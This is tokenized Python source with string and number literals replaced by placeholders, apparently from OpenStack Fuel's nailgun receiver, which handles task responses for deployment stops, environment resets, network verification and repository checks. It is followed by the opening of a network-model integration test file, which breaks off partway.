task_status in ( consts . TASK_STATUSES . ready , <EOL> consts . TASK_STATUSES . error ) : <EOL> al = objects . ActionLog . get_by_kwargs ( task_uuid = task_uuid , <EOL> action_name = task_name ) <EOL> if al : <EOL> data = { <EOL> '<STR_LIT>' : datetime . datetime . utcnow ( ) , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : cls . sanitize_nodes_from_resp ( <EOL> nodes_from_resp ) , <EOL> '<STR_LIT>' : task_status <EOL> } <EOL> } <EOL> objects . ActionLog . update ( al , data ) <EOL> except Exception as e : <EOL> logger . error ( "<STR_LIT>" , <EOL> six . text_type ( e ) ) <EOL> @ classmethod <EOL> def sanitize_nodes_from_resp ( cls , nodes ) : <EOL> resp = [ ] <EOL> if isinstance ( nodes , list ) : <EOL> for n in nodes : <EOL> if isinstance ( n , dict ) and '<STR_LIT>' in n : <EOL> resp . append ( n [ '<STR_LIT>' ] ) <EOL> return resp <EOL> @ classmethod <EOL> def _generate_error_message ( cls , task , error_types , names_only = False ) : <EOL> nodes_info = [ ] <EOL> error_nodes = db ( ) . query ( Node ) . filter_by ( <EOL> cluster_id = task . cluster_id <EOL> ) . filter ( <EOL> or_ ( <EOL> Node . status == '<STR_LIT:error>' , <EOL> Node . online == ( False ) <EOL> ) <EOL> ) . filter ( <EOL> Node . error_type . in_ ( error_types ) <EOL> ) . all ( ) <EOL> for n in error_nodes : <EOL> if names_only : <EOL> nodes_info . append ( u"<STR_LIT>" . format ( n . name ) ) <EOL> else : <EOL> nodes_info . append ( u"<STR_LIT>" . format ( n . name , n . error_msg ) ) <EOL> if nodes_info : <EOL> if names_only : <EOL> message = u"<STR_LIT:U+002CU+0020>" . join ( nodes_info ) <EOL> else : <EOL> message = u"<STR_LIT:\n>" . join ( nodes_info ) <EOL> else : <EOL> message = None <EOL> return message <EOL> @ classmethod <EOL> def _error_action ( cls , task , status , progress , message = None ) : <EOL> task_name = task . name . title ( ) <EOL> if message : <EOL> message = u"<STR_LIT>" . format ( task_name , message ) <EOL> notify_message = message . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> else : <EOL> error_message = cls . _generate_error_message ( <EOL> task , <EOL> error_types = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> names_only = True <EOL> ) <EOL> message = u"<STR_LIT>" . format ( <EOL> task_name , error_message <EOL> ) <EOL> notify_message = message if error_message is not None else None <EOL> cls . _notify ( task , consts . NOTIFICATION_TOPICS . error , notify_message ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def _success_action ( cls , task , status , progress , nodes ) : <EOL> if any ( n . status == consts . NODE_STATUSES . error for n in nodes ) : <EOL> cls . _error_action ( task , '<STR_LIT:error>' , <NUM_LIT:100> ) <EOL> return <EOL> task_name = task . name . title ( ) <EOL> if nodes : <EOL> remaining = objects . Cluster . get_nodes_count_unmet_status ( <EOL> nodes [ <NUM_LIT:0> ] . cluster , nodes [ <NUM_LIT:0> ] . status <EOL> ) <EOL> if remaining > <NUM_LIT:0> : <EOL> message = u"<STR_LIT>" . format ( <EOL> task_name , len ( nodes ) <EOL> ) <EOL> else : <EOL> message = u"<STR_LIT>" . format ( <EOL> task_name , task . cluster . name <EOL> ) <EOL> else : <EOL> message = u"<STR_LIT>" . format ( task_name ) <EOL> zabbix_url = objects . Cluster . get_network_manager ( <EOL> task . cluster <EOL> ) . get_zabbix_url ( task . cluster ) <EOL> if zabbix_url : <EOL> message = "<STR_LIT>" . format ( <EOL> message , zabbix_url ) <EOL> if task . name != consts . TASK_NAMES . provision : <EOL> plugins_msg = cls . _make_plugins_success_message ( <EOL> ClusterPlugins . get_enabled ( task . cluster . id ) ) <EOL> if plugins_msg : <EOL> message = '<STR_LIT>' . format ( message , plugins_msg ) <EOL> cls . _notify ( task , consts . NOTIFICATION_TOPICS . done , message ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def _make_plugins_success_message ( cls , plugins ) : <EOL> """<STR_LIT>""" <EOL> msg = '<STR_LIT>' <EOL> return '<STR_LIT:\n>' . join ( <EOL> map ( lambda p : msg . format ( p . name , p . description ) , plugins ) ) <EOL> @ classmethod <EOL> def stop_deployment_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> ia_nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> ) <EOL> stopping_task_names = [ <EOL> consts . TASK_NAMES . deploy , <EOL> consts . TASK_NAMES . deployment , <EOL> consts . TASK_NAMES . provision <EOL> ] <EOL> q_stop_tasks = objects . TaskCollection . filter_by_list ( <EOL> None , <EOL> '<STR_LIT:name>' , <EOL> stopping_task_names <EOL> ) <EOL> q_stop_tasks = objects . TaskCollection . filter_by ( <EOL> q_stop_tasks , <EOL> cluster_id = task . cluster_id <EOL> ) <EOL> stop_tasks = objects . TaskCollection . order_by ( <EOL> q_stop_tasks , <EOL> '<STR_LIT:id>' <EOL> ) . all ( ) <EOL> objects . Cluster . get_by_uid ( <EOL> task . cluster_id , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> if not stop_tasks : <EOL> logger . warning ( "<STR_LIT>" , task . cluster_id ) <EOL> if status == consts . TASK_STATUSES . ready : <EOL> task . cluster . status = consts . CLUSTER_STATUSES . stopped <EOL> if stop_tasks : <EOL> objects . Task . bulk_delete ( x . id for x in stop_tasks ) <EOL> node_uids = [ n [ '<STR_LIT>' ] for n in itertools . chain ( nodes , ia_nodes ) ] <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( None , node_uids ) <EOL> q_nodes = objects . NodeCollection . filter_by ( <EOL> q_nodes , <EOL> cluster_id = task . cluster_id <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> update_nodes = objects . NodeCollection . lock_for_update ( <EOL> q_nodes <EOL> ) . all ( ) <EOL> for node in update_nodes : <EOL> objects . Node . reset_to_discover ( node ) <EOL> if ia_nodes : <EOL> cls . _notify_inaccessible ( <EOL> task . cluster_id , <EOL> [ n [ "<STR_LIT>" ] for n in ia_nodes ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> message = ( <EOL> u"<STR_LIT>" <EOL> . format ( task . cluster . name or task . cluster_id ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT>" , <EOL> message , <EOL> task . cluster_id <EOL> ) <EOL> elif status == consts . TASK_STATUSES . error : <EOL> task . cluster . status = consts . CLUSTER_STATUSES . error <EOL> if stop_tasks : <EOL> objects . Task . bulk_delete ( x . id for x in stop_tasks ) <EOL> q_nodes = objects . NodeCollection . filter_by ( <EOL> None , <EOL> cluster_id = task . cluster_id <EOL> ) <EOL> q_nodes = objects . NodeCollection . filter_by ( <EOL> q_nodes , <EOL> status = consts . NODE_STATUSES . deploying <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> update_nodes = objects . NodeCollection . lock_for_update ( <EOL> q_nodes <EOL> ) . all ( ) <EOL> for node_db in update_nodes : <EOL> node_db . status = consts . NODE_STATUSES . error <EOL> node_db . progress = <NUM_LIT:100> <EOL> node_db . error_type = consts . NODE_ERRORS . stop_deployment <EOL> db ( ) . flush ( ) <EOL> message = ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> . format ( task . cluster . name or task . cluster_id , message ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT:error>" , <EOL> message , <EOL> task . cluster_id <EOL> ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def reset_environment_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> ia_nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> objects . Cluster . get_by_uid ( <EOL> task . cluster_id , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> if status == consts . TASK_STATUSES . ready : <EOL> task . cluster . status = consts . CLUSTER_STATUSES . new <EOL> objects . Cluster . add_pending_changes ( <EOL> task . cluster , <EOL> consts . CLUSTER_CHANGES . attributes <EOL> ) <EOL> objects . Cluster . add_pending_changes ( <EOL> task . cluster , <EOL> consts . CLUSTER_CHANGES . networks <EOL> ) <EOL> node_uids = [ n [ "<STR_LIT>" ] for n in itertools . chain ( nodes , ia_nodes ) ] <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( None , node_uids ) <EOL> q_nodes = objects . NodeCollection . filter_by ( <EOL> q_nodes , <EOL> cluster_id = task . cluster_id <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> update_nodes = objects . NodeCollection . lock_for_update ( <EOL> q_nodes <EOL> ) . all ( ) <EOL> for node in update_nodes : <EOL> logs_utils . delete_node_logs ( node ) <EOL> objects . Node . reset_to_discover ( node ) <EOL> if ia_nodes : <EOL> cls . _notify_inaccessible ( <EOL> task . cluster_id , <EOL> [ n [ "<STR_LIT>" ] for n in ia_nodes ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> message = ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" . format ( <EOL> task . cluster . name or task . cluster_id <EOL> ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT>" , <EOL> message , <EOL> task . cluster_id <EOL> ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def _notify_inaccessible ( cls , cluster_id , nodes_uids , action ) : <EOL> ia_nodes_db = db ( ) . query ( Node . name ) . filter ( <EOL> Node . id . in_ ( nodes_uids ) , <EOL> Node . cluster_id == cluster_id <EOL> ) . order_by ( Node . id ) . yield_per ( <NUM_LIT:100> ) <EOL> ia_message = ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" . format ( <EOL> action , <EOL> u"<STR_LIT:U+002CU+0020>" . join ( [ <EOL> u"<STR_LIT>" . format ( n . name ) <EOL> for n in ia_nodes_db <EOL> ] ) <EOL> ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT>" , <EOL> ia_message , <EOL> cluster_id <EOL> ) <EOL> @ classmethod <EOL> def verify_networks_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' ) <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> result = [ ] <EOL> if nodes is None : <EOL> pass <EOL> elif isinstance ( nodes , list ) : <EOL> cached_nodes = task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] <EOL> node_uids = [ str ( n [ '<STR_LIT>' ] ) for n in nodes ] <EOL> cached_node_uids = [ str ( n [ '<STR_LIT>' ] ) for n in cached_nodes ] <EOL> forgotten_uids = set ( cached_node_uids ) - set ( node_uids ) <EOL> if forgotten_uids : <EOL> absent_nodes = db ( ) . query ( Node ) . filter ( <EOL> Node . id . in_ ( forgotten_uids ) <EOL> ) . all ( ) <EOL> absent_node_names = [ ] <EOL> for n in absent_nodes : <EOL> if n . name : <EOL> absent_node_names . append ( n . name ) <EOL> else : <EOL> absent_node_names . append ( '<STR_LIT>' % n . id ) <EOL> if not error_msg : <EOL> error_msg = '<STR_LIT>' . format ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( absent_node_names ) <EOL> ) <EOL> status = '<STR_LIT:error>' <EOL> else : <EOL> error_nodes = [ ] <EOL> node_excluded_networks = [ ] <EOL> for node in nodes : <EOL> cached_nodes_filtered = filter ( <EOL> lambda n : str ( n [ '<STR_LIT>' ] ) == str ( node [ '<STR_LIT>' ] ) , <EOL> cached_nodes <EOL> ) <EOL> if not cached_nodes_filtered : <EOL> logger . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> node <EOL> ) <EOL> continue <EOL> cached_node = cached_nodes_filtered [ <NUM_LIT:0> ] <EOL> excluded_networks = cached_node . get ( <EOL> '<STR_LIT>' , [ ] ) <EOL> if excluded_networks : <EOL> interfaces = '<STR_LIT:U+002CU+0020>' . join ( <EOL> [ net . get ( '<STR_LIT>' ) for net in excluded_networks ] ) <EOL> node_excluded_networks . append ( { <EOL> '<STR_LIT>' : cached_node [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : interfaces <EOL> } ) <EOL> errors = connectivity_check . check_received_data ( <EOL> cached_node , node ) <EOL> error_nodes . extend ( errors ) <EOL> if error_nodes : <EOL> result = error_nodes <EOL> status = '<STR_LIT:error>' <EOL> else : <EOL> if node_excluded_networks : <EOL> interfaces_list = '<STR_LIT:U+002CU+0020>' . join ( <EOL> [ '<STR_LIT>' . format ( <EOL> item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] ) <EOL> for item in node_excluded_networks ] ) <EOL> error_msg = connectivity_check . append_message ( <EOL> error_msg , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( interfaces_list ) , <EOL> ) <EOL> if task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> error_msg = connectivity_check . append_message ( <EOL> error_msg , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] ) <EOL> ) <EOL> else : <EOL> error_msg = ( error_msg or <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> status = '<STR_LIT:error>' <EOL> logger . error ( error_msg ) <EOL> if status not in ( '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> data = { <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : progress , <EOL> '<STR_LIT:message>' : error_msg , <EOL> '<STR_LIT:result>' : result <EOL> } <EOL> objects . Task . update ( task , data ) <EOL> else : <EOL> objects . Task . update_verify_networks ( <EOL> task , status , progress , error_msg , result ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def multicast_verification_resp ( cls , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( <EOL> u"<STR_LIT>" . format ( <EOL> jsonutils . dumps ( kwargs ) ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . task . Task . get_by_uuid ( uuid = task_uuid ) <EOL> if kwargs . get ( '<STR_LIT:status>' ) : <EOL> task . status = kwargs [ '<STR_LIT:status>' ] <EOL> task . progress = kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> response = kwargs . get ( '<STR_LIT>' , { } ) <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> if task . status == TASK_STATUSES . error : <EOL> task . message = error_msg <EOL> elif task . status == TASK_STATUSES . ready : <EOL> errors = [ ] <EOL> results = [ ] <EOL> node_ids = set ( config [ '<STR_LIT>' ] for config <EOL> in task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] ) <EOL> not_received_nodes = node_ids - set ( response . keys ( ) ) <EOL> if not_received_nodes : <EOL> msg = ( u'<STR_LIT>' ) . format ( <EOL> list ( not_received_nodes ) ) <EOL> errors . append ( msg ) <EOL> for node_id , received_ids in six . iteritems ( response ) : <EOL> result = { } <EOL> not_received_ids = node_ids - set ( received_ids or [ ] ) <EOL> result = { '<STR_LIT>' : node_id , <EOL> '<STR_LIT>' : list ( not_received_ids ) } <EOL> results . append ( result ) <EOL> if not_received_ids : <EOL> msg = ( u'<STR_LIT>' <EOL> u'<STR_LIT>' ) . format ( not_received_ids , node_id ) <EOL> errors . append ( msg ) <EOL> task . message = '<STR_LIT:\n>' . join ( errors ) <EOL> if errors : <EOL> task . status = TASK_STATUSES . error <EOL> task . result = results <EOL> if task . status == TASK_STATUSES . ready : <EOL> editable = copy . deepcopy ( task . cluster . attributes . editable ) <EOL> editable [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:value>' ] = True <EOL> task . cluster . attributes . editable = editable <EOL> logger . debug ( u'<STR_LIT>' , task . message ) <EOL> objects . Task . update_verify_networks ( <EOL> task , task . status , <EOL> task . progress , task . message , task . result ) <EOL> @ classmethod <EOL> def check_dhcp_resp ( cls , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> messages = [ ] <EOL> result = collections . defaultdict ( list ) <EOL> message_template = ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> nodes_uids = [ node [ '<STR_LIT>' ] for node in nodes ] <EOL> nodes_db = db ( ) . query ( Node ) . filter ( Node . id . in_ ( nodes_uids ) ) . all ( ) <EOL> nodes_map = dict ( ( str ( node . id ) , node ) for node in nodes_db ) <EOL> master_network_mac = settings . ADMIN_NETWORK [ '<STR_LIT>' ] <EOL> logger . debug ( '<STR_LIT>' , master_network_mac ) <EOL> for node in nodes : <EOL> if node [ '<STR_LIT:status>' ] == '<STR_LIT>' : <EOL> for row in node . get ( '<STR_LIT:data>' , [ ] ) : <EOL> if not net_utils . is_same_mac ( row [ '<STR_LIT>' ] , <EOL> master_network_mac ) : <EOL> node_db = nodes_map . get ( node [ '<STR_LIT>' ] ) <EOL> if node_db : <EOL> row [ '<STR_LIT>' ] = node_db . name <EOL> message = message_template . format ( ** row ) <EOL> messages . append ( message ) <EOL> result [ node [ '<STR_LIT>' ] ] . append ( row ) <EOL> else : <EOL> logger . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , row ) <EOL> status = status if not messages else "<STR_LIT:error>" <EOL> error_msg = '<STR_LIT:\n>' . join ( messages ) if messages else error_msg <EOL> logger . debug ( '<STR_LIT>' , error_msg ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> objects . Task . update_verify_networks ( task , status , progress , <EOL> error_msg , result ) <EOL> @ classmethod <EOL> def download_release_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> release_info = task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] <EOL> release_id = release_info [ '<STR_LIT>' ] <EOL> release = db ( ) . query ( Release ) . get ( release_id ) <EOL> if not release : <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" , release_id ) <EOL> return <EOL> if error_msg : <EOL> status = '<STR_LIT:error>' <EOL> error_msg = "<STR_LIT>" "<STR_LIT>" . format ( release . name ) <EOL> cls . _download_release_error ( <EOL> release_id , <EOL> error_msg <EOL> ) <EOL> elif progress == <NUM_LIT:100> and status == '<STR_LIT>' : <EOL> cls . _download_release_completed ( release_id ) <EOL> result = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : release_id <EOL> } <EOL> } <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : error_msg , <EOL> '<STR_LIT:result>' : result } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def dump_environment_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> error = kwargs . get ( '<STR_LIT:error>' ) <EOL> msg = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> if status == '<STR_LIT:error>' : <EOL> notifier . notify ( '<STR_LIT:error>' , error ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT:message>' : error } <EOL> objects . Task . update ( task , data ) <EOL> elif status == '<STR_LIT>' : <EOL> dumpfile = os . path . basename ( msg ) <EOL> notifier . notify ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> dumpfile_url = reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : dumpfile } ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , <EOL> '<STR_LIT:message>' : dumpfile_url } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def stats_user_resp ( cls , ** kwargs ) : <EOL> logger . info ( "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> error = kwargs . get ( '<STR_LIT:error>' ) <EOL> message = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , fail_if_not_found = True , lock_for_update = True ) <EOL> if status not in ( consts . TASK_STATUSES . ready , <EOL> consts . TASK_STATUSES . error ) : <EOL> logger . debug ( "<STR_LIT>" , <EOL> task . name , task . id , task . status ) <EOL> return <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT:message>' : message } <EOL> if status == consts . TASK_STATUSES . error : <EOL> logger . error ( "<STR_LIT>" , <EOL> task . name , task . id , error ) <EOL> data [ '<STR_LIT:message>' ] = error <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> @ classmethod <EOL> def _get_failed_repos ( cls , node ) : <EOL> """<STR_LIT>""" <EOL> return node [ '<STR_LIT>' ] . get ( '<STR_LIT>' , [ ] ) <EOL> @ classmethod <EOL> def _check_repos_connectivity ( cls , resp_kwargs , failed_nodes_msg , <EOL> suggestion_msg = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> task_uuid = resp_kwargs . get ( '<STR_LIT>' ) <EOL> response = resp_kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> status = consts . TASK_STATUSES . ready <EOL> progress = <NUM_LIT:100> <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , fail_if_not_found = True ) <EOL> failed_response_nodes = { <EOL> n [ '<STR_LIT>' ] : n for n in response if n [ '<STR_LIT:status>' ] != <NUM_LIT:0> <EOL> } <EOL> failed_nodes = [ ] <EOL> failed_repos = set ( ) <EOL> master = failed_response_nodes . pop ( consts . MASTER_NODE_UID , None ) <EOL> if master is not None : <EOL> failed_repos . update ( cls . _get_failed_repos ( master ) ) <EOL> failed_nodes . append ( consts . MASTER_NODE_NAME ) <EOL> nodes = objects . NodeCollection . filter_by_list ( <EOL> None , '<STR_LIT:id>' , failed_response_nodes , order_by = '<STR_LIT:id>' ) <EOL> for node in nodes : <EOL> failed_repos . update ( cls . _get_failed_repos ( <EOL> failed_response_nodes [ node . uid ] ) ) <EOL> failed_nodes . append ( node . name ) <EOL> err_msg = '<STR_LIT>' <EOL> failed_repos_msg = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if failed_nodes : <EOL> err_msg = failed_nodes_msg . format ( '<STR_LIT:U+002CU+0020>' . join ( failed_nodes ) ) <EOL> if failed_repos : <EOL> err_msg += failed_repos_msg . format ( '<STR_LIT:U+002CU+0020>' . join ( failed_repos ) ) <EOL> if err_msg and suggestion_msg : <EOL> err_msg += suggestion_msg <EOL> if err_msg : <EOL> status = consts . TASK_STATUSES . error <EOL> objects . Task . update_verify_networks ( <EOL> task , status , progress , err_msg , { } ) <EOL> @ classmethod <EOL> def check_repositories_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> failed_nodes_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> cls . _check_repos_connectivity ( kwargs , failed_nodes_msg ) <EOL> @ classmethod <EOL> def check_repositories_with_setup_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> failed_nodes_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> suggestion_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> cls . _check_repos_connectivity ( kwargs , failed_nodes_msg , <EOL> suggestion_msg ) <EOL> @ classmethod <EOL> def task_in_orchestrator ( cls , ** kwargs ) : <EOL> logger . info ( "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> try : <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True , <EOL> lock_for_update = True ) <EOL> if task . status == consts . TASK_STATUSES . pending : <EOL> objects . Task . update ( <EOL> task , { '<STR_LIT:status>' : consts . TASK_STATUSES . running } ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> task_uuid ) <EOL> else : <EOL> logger . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , task_uuid , <EOL> task . status ) <EOL> except nailgun_errors . ObjectNotFound : <EOL> logger . warning ( "<STR_LIT>" <EOL> "<STR_LIT>" , task_uuid ) <EOL> @ classmethod <EOL> def update_dnsmasq_resp ( cls , ** kwargs ) : <EOL> logger . info ( "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> error = kwargs . get ( '<STR_LIT:error>' , '<STR_LIT>' ) <EOL> message = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , fail_if_not_found = True , lock_for_update = True ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT:message>' : message } <EOL> if status == consts . TASK_STATUSES . error : <EOL> logger . error ( "<STR_LIT>" , <EOL> task . name , task . id , error ) <EOL> data [ '<STR_LIT:message>' ] = error <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , [ ] ) </s>
<s> from mock import patch <EOL> from oslo_serialization import jsonutils <EOL> import yaml <EOL> from nailgun . objects import Cluster <EOL> from nailgun . extensions . network_manager . objects . serializers . network_configuration import NeutronNetworkConfigurationSerializer <EOL> from nailgun . extensions . network_manager . objects . serializers . network_configuration import NovaNetworkConfigurationSerializer <EOL> from nailgun import consts <EOL> from nailgun . db . sqlalchemy . models import NeutronConfig <EOL> from nailgun . db . sqlalchemy . models import NovaNetworkConfig <EOL> from nailgun . test . base import BaseIntegrationTest <EOL> from nailgun . utils import reverse <EOL> class TestNetworkModels ( BaseIntegrationTest ) : <EOL> network_config = { <EOL> "<STR_LIT>" : consts . NEUTRON_L23_PROVIDERS . ovs , <EOL> "<STR_LIT>" : consts . NEUTRON_SEGMENT_TYPES . gre , <EOL> "<STR_LIT>" : [ <NUM_LIT:1000> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT:2> 